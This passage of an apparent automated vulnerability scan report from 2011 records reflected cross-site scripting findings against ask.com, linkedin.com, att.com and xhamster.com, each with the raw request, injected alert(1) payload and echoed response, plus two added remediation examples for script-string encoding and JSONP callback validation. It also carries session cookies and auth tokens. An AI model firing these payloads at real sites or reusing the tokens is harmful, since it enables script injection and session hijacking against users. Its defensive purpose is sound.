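The remediation text above is the same for every script-context finding in this report (1.47 through 1.49, 1.53 and 1.56). What follows is an added example, not code from the report or from any of the scanned sites, showing what JavaScript-string encoding has to do to make a document.write(...) literal like the pubmatic and ask.com ones safe. It uses the two payloads the report records for the pageURL parameter (1.48) and the q parameter (1.56); the function names and the reduced template strings are this example's own.

```javascript
// Added example, not code from the report or from any of the scanned sites.
// Encodes an untrusted value for a JavaScript string literal that is itself
// written inside an inline <script> block, then checks both payloads the report
// records (pageURL in 1.48, q in 1.56) against the raw and the encoded output.
// Function names and the reduced templates are this example's own.

// Emit every character outside [A-Za-z0-9] as \xHH or \uHHHH. This neutralises
// quote characters, backslashes, the </script> sequence, and the U+2028/U+2029
// line terminators, while the browser still decodes the literal to the same value.
function jsStringEncode(value) {
  let out = '';
  for (const ch of String(value)) {        // iterates by code point
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch;
      continue;
    }
    const cp = ch.codePointAt(0);
    if (cp < 0x100) {
      out += '\\x' + cp.toString(16).padStart(2, '0');
    } else if (cp < 0x10000) {
      out += '\\u' + cp.toString(16).padStart(4, '0');
    } else {
      // Astral code point: emit its UTF-16 surrogate pair as two \uHHHH escapes.
      for (let k = 0; k < ch.length; k++) {
        out += '\\u' + ch.charCodeAt(k).toString(16).padStart(4, '0');
      }
    }
  }
  return out;
}

// What the report flags: the parameter is concatenated straight into a
// single-quoted literal inside document.write(...).
function vulnerableScript(pageURL) {
  return "<script>document.write('<iframe src=\"" + pageURL +
         "\"></iframe>');</script>";
}

// Hardened form: identical output shape, value encoded for the literal.
function hardenedScript(pageURL) {
  return "<script>document.write('<iframe src=\"" + jsStringEncode(pageURL) +
         "\"></iframe>');</script>";
}

// The generated markup should contain exactly one </script and exactly the two
// single quotes of the document.write literal; anything else means the value
// escaped its context.
function scriptBlockIntact(html) {
  const closes = (html.match(/<\/script/gi) || []).length;
  const quotes = (html.match(/'/g) || []).length;
  return closes === 1 && quotes === 2;
}

// Does a JavaScript engine recover the original value from the encoded literal?
function decodesBack(value) {
  return new Function("return '" + jsStringEncode(value) + "';")() === value;
}
```

Run `scriptBlockIntact(vulnerableScript(p))` and `scriptBlockIntact(hardenedScript(p))` with either recorded payload: the raw template fails on both (the 1.48 payload adds two quote characters, the 1.56 payload adds two </script sequences), the encoded template passes on both, and `decodesBack` confirms the page still receives the original value. The [A-Za-z0-9] allow-list is deliberately stricter than escaping only quotes, because the 1.56 payload shows that quotes are not the only way out of a script literal.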

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss40b5e</script><script>alert(1)</script>b21e6c4ebb7&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNApcQDYAAEsEBg8AAADv
from-tr: trafrt006iad.io.askjeeves.info
Cache-Control: private
Content-Length: 67803
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:05 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:04 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-special&ch=&ty=image%2Cflash&size=300x250&kw=xss40b5e</script><script>alert(1)</script>b21e6c4ebb7&hints=xss40b5e</script>
...[SNIP]...

1.57. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the url field of the JSON object passed to the IN.Tags.Share.handleCount JSONP callback. The payload da1ff<img%20src%3da%20onerror%3dalert(1)>83d974f0d29 was submitted in the url parameter. This input was echoed as da1ff<img src=a onerror=alert(1)>83d974f0d29 in the application's response: forward slashes in the value are escaped as \/, but < and > are passed through unchanged.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. One caveat should be weighed against the Certain confidence rating: the response is served with Content-Type: text/javascript;charset=UTF-8, so a browser sent directly to this URL displays the body as text rather than rendering the <img> element. The injected markup executes only if the page that consumes this JSONP response writes the returned url value into the DOM as HTML.
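Both JSONP findings in this report (1.52, where the callback name is reflected unvalidated into a text/html response, and 1.57, where < and > survive JSON serialisation) come down to the same two missing controls. The following is an added example, not code from tudou.com, linkedin.com or the report: it validates the callback name, escapes the characters that matter inside script, and labels the body as JavaScript. The callback names and data values are the ones visible in the two findings; the function names are this example's own.

```javascript
// Added example, not code from tudou.com, linkedin.com or the report. A JSONP
// endpoint with the two controls missing in findings 1.52 and 1.57: the callback
// name is validated as a dotted JavaScript identifier, and the serialised data
// cannot contain '<', '>' or '&'. The response is labelled as script, not HTML.
// Function names are this example's own.

// Accept callbacks such as adExtension.callback or IN.Tags.Share.handleCount:
// identifiers separated by dots, nothing else (no brackets, quotes, <, > or spaces).
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;

function validCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// JSON.stringify escapes '"' and '\' already. Also escape the characters that
// matter if the body is ever parsed as HTML or inlined into a <script> block,
// using \uXXXX escapes that remain valid JSON and valid JavaScript.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Build the JSONP response as {status, headers, body}. A bad callback name is
// rejected outright rather than echoed, which is the behaviour 1.52 lacks.
function jsonpResponse(callback, data) {
  if (!validCallback(callback)) {
    return {
      status: 400,
      headers: { 'Content-Type': 'text/plain; charset=utf-8', 'X-Content-Type-Options': 'nosniff' },
      body: 'invalid callback',
    };
  }
  return {
    status: 200,
    headers: {
      // 1.52 served text/html and 1.57 text/javascript; use the script type
      // and forbid sniffing so the body is never interpreted as a document.
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: callback + '(' + jsonForScript(data) + ');',
  };
}
```

Calling `jsonpResponse` with the 1.52 callback payload returns a 400 instead of echoing the <script> element; calling it with IN.Tags.Share.handleCount and the 1.57 url value produces a body in which the <img> tag survives only as \u003cimg ... \u003e, which JSON.parse still decodes to the original string, so a well-behaved consumer loses nothing.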

Request

GET /countserv/count/share?url=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Fmarkets%2Fmarkets_newyork%2Fda1ff<img%20src%3da%20onerror%3dalert(1)>83d974f0d29 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&ffb9fd87-5fef-4c75-aff7-69ec3ecfc40f"; __utma=23068709.1023992008.1312316317.1312316317.1312316317.1; __utmz=23068709.1312316317.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-606535281-1312316322746; leo_auth_token="GST:9kV4dA_13XEwRje4Ur-ws37Xd4cv3oxv5UwmamcnIX7CaxeBbLCcCO:1313432885:4ea5431fc1005486203c8da5c11ec53c95bd241b"; JSESSIONID="ajax:9204315133332545933"; lang="v=2&lang=en&c="; X-LI-IDC=C1; NSC_MC_QH_MFP=ffffffffaf19965845525d5f4f58455e445a4a42198c; NSC_MC_WT_FU_IUUQ=ffffffffaf1994c945525d5f4f58455e445a4a42198d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:48:10 GMT
Content-Length: 156

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/money.cnn.com\/2011\/08\/15\/markets\/markets_newyork\/da1ff<img src=a onerror=alert(1)>83d974f0d29"});

1.58. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp [source parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/free-packages.jsp

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 90d55><a%20b%3dc>17435fcd4f5 was submitted in the source parameter. This input was echoed as 90d55><a b=c>17435fcd4f5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. In the response shown below, the <meta> tag's own quotation marks are emitted as &quot; entities rather than literal quote characters, so the browser treats the content value as unquoted: the value ends at the first > in the payload, and the <a b=c> that follows is parsed as a new element. The payload itself contains no quotation marks, so the response does not show how the application handles them. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55><a%20b%3dc>17435fcd4f5 HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 135165
Expires: Mon, 15 Aug 2011 18:20:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:38 GMT
Connection: close
Set-Cookie: TLTHID=464A0280C76B10C7B2BBC420C1A5C223; Path=/; Domain=.att.com


                                                                                                                           
...[SNIP]...
<meta name=&quot;WT.mc_id&quot; content=&quot;ECWD000000000000O90d55><a b=c>17435fcd4f5&quot;>
...[SNIP]...

1.59. http://xhamster.com/signup.php [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1838"><script>alert(1)</script>64dd5f3a826dcd71f was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27&prev=&email=&username=&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallasd1838"><script>alert(1)</script>64dd5f3a826dcd71f&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:54 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m4
Vary: Accept-Encoding
Content-Length: 29363

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<input type="text" name="city" value="Dallasd1838"><script>alert(1)</script>64dd5f3a826dcd71f" />
...[SNIP]...

1.60. http://xhamster.com/signup.php [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e376d><script>alert(1)</script>ebfff57a20ad33bc8 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27&prev=&email=e376d><script>alert(1)</script>ebfff57a20ad33bc8&username=&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallas&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m2
Vary: Accept-Encoding
Content-Length: 29358

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<INPUT type=text maxLength=60 size=20 name=email value=e376d><script>alert(1)</script>ebfff57a20ad33bc8>
...[SNIP]...

1.61. http://xhamster.com/signup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5359a%3balert(1)//941552ed9d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5359a;alert(1)//941552ed9d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/scrip/5359a%3balert(1)//941552ed9d6t%3E HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:09:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2
Srv: m3
Vary: Accept-Encoding
Content-Length: 29239

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
</scrip/5359a;alert(1)//941552ed9d6t>
...[SNIP]...

1.62. http://xhamster.com/signup.php [next parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the next request parameter is copied into the HTML document as plain text between tags. The payload 47a9a<script>alert(1)</script>1fbbb0d5fcf was submitted in the next parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E47a9a<script>alert(1)</script>1fbbb0d5fcf HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:09:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.6
Srv: m13
Vary: Accept-Encoding
Content-Length: 29357

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
</script>47a9a<script>alert(1)</script>1fbbb0d5fcf">
...[SNIP]...

1.63. http://xhamster.com/signup.php [next parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the next request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e9a"><script>alert(1)</script>f501e5879f9 was submitted in the next parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php?next=71e9a"><script>alert(1)</script>f501e5879f9 HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:09:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.6
Srv: m13
Vary: Accept-Encoding
Content-Length: 29243

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<FORM id=signupForm name=signupForm method=post action="http://xhamster.com/signup.php?next=71e9a"><script>alert(1)</script>f501e5879f9">
...[SNIP]...

1.64. http://xhamster.com/signup.php [next parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the next request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b305a"><script>alert(1)</script>18d9db32d7980cbc5 was submitted in the next parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27b305a"><script>alert(1)</script>18d9db32d7980cbc5&prev=&email=&username=&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallas&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m9
Vary: Accept-Encoding
Content-Length: 29429

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<FORM id=signupForm name=signupForm method=post action="http://xhamster.com/signup.php?next='b305a"><script>alert(1)</script>18d9db32d7980cbc5">
...[SNIP]...

1.65. http://xhamster.com/signup.php [prev parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57177"><script>alert(1)</script>d0d29e61179a32969 was submitted in the prev parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27&prev=57177"><script>alert(1)</script>d0d29e61179a32969&email=&username=&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallas&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Srv: m13
Vary: Accept-Encoding
Content-Length: 29363

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<INPUT type="hidden" name="prev" value="57177"><script>alert(1)</script>d0d29e61179a32969">
...[SNIP]...

1.66. http://xhamster.com/signup.php [username parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ffa66><script>alert(1)</script>4cbc2a1fa75fa2b7b was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

